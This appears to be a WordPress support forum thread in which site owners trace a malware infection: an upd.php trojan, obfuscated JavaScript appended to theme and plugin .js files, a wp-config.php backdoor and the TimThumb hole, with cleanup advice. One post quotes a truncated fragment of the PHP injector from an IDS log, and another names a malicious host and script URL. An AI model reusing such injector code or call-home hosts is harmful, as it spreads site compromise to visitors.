Malware Detected by Chrome

I think I’ve found something.

The file upd.php in wp-content is detected as a trojan. It’s not in wordpress file, Can I delete it? I’ve opened it, this is its content:

[Code moderated as per the Forum Rules. Please use the pastebin]

Unless upd.php is a file you use in a plugin or theme, then I would remove it.

If it is a plugin or theme file, get a clean one.

It probably varies based on the (infected) site. I used https://sitecheck.sucuri.net/scanner/ to tell me exactly which files were infected. In every case it was the last line of the file that had that nasty hex-javascript junk.

Oops sorry, this reply was REALLY late.

This has no sense.

I’ve deleted upd.php. It was in wp-content and wp-admin.

Besides, I’ve downloaded folders wp-admin, wp-content and wp-includes, and then, I’ve look of “var _0x80d0=[“\x64\” in every files with dreamweaver and there weres no matches.

This has no sense. The malware 31.184.242.102 only appears in my admin panel when I activate addthis plugin, which I’ve deleted and uploaded again several times…

@ fellowito

upd.php was a known malicious file with the timthumb hack. Make sure that if any of your plugins or theme uses timthumb or a variant thereof, that it is updated/patched.

@fellowito, Take a look at the contents of the js file

/wp-content/themes/bds4/jquery-1.6.2.min.js

This is the end of the legitimate code in the file

a.jQuery=a.$=f})(window);

everything after that starting with

var _0xa687= is the malicious part.

We saw the malware in two plugins:

Shareaholic and Mini Fancybox

I deleted those files and did not install it anymore since it may trigger it again.

Just in case this helps

@fellowito Another question — The script at the bottom of

/wp-content/themes/bds4/jquery-ui.min.js
/wp-content/themes/bds4/jquery-1.6.2.min.js

de-obfuscates to https:// 31 . 184 . 242 . 103/s.php .103 not .102

but the warning you are getting still says 31.184.242.102 ??

I’ve the same problem, my IDS detect the attack

POST.HOST
set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x...

You have to clean all the js files of your wordpress installation. Also, you need to check the wp-config.php, the virus add a backdoor at the end of the file.
I’m still looking a best solution to this…
It’s a WordPress security issue?

@redleg-too thanks.

I think now it’s solved.

I had to delete folders wp-admin and wp-include, and uploaded them again.

I had to replace every javascript file that were in wp-content (plugins and theme).

There should be some kind of plugin to detect what file are infected or something, because antivirus plugin didn’t detect this.

How long after cleaning all the files does the malware warning go away?

I deleted the wp-admin and wp-include and cleaned every theme and plugin .js file, yet I’m still getting the warning.

I also have a WP site with this hack.

At least 200 .js files where infected. I first cleaned all of these files.

After four days it was all back.

Now I have cleaned it also adjusted the wp-config.php and deleted the upd.php in the wp-admin and wp-content folder.

I also saw a folder backup-b1b2f in the wp-content folder with an empty index.php.

I am looking into the files on a daily basis. I will keep you posted.

These are the possible infected themes:
https://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

I also updated TimThumb but thise site provides some extra info on preventing remote download:

https://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/

Hey.

I also have this problem with my site suomilacrosse.com. I replaced all JS files with fresh ones and did multiple site security checks afterwards with clean results. I made a reconsideration request for Google for which I received the answer that “No manual spam actions found”. However when visiting my site with Chrome visitors still get the “malware detected” alert and some have said their antivirus software alert when visiting the site.

Any help? :/

did you check the wp-configuration and the wp-contents and wp-admin folder for a suspicious upd.php? If your theme uses timthumb also check the link aboute in preventing remote download.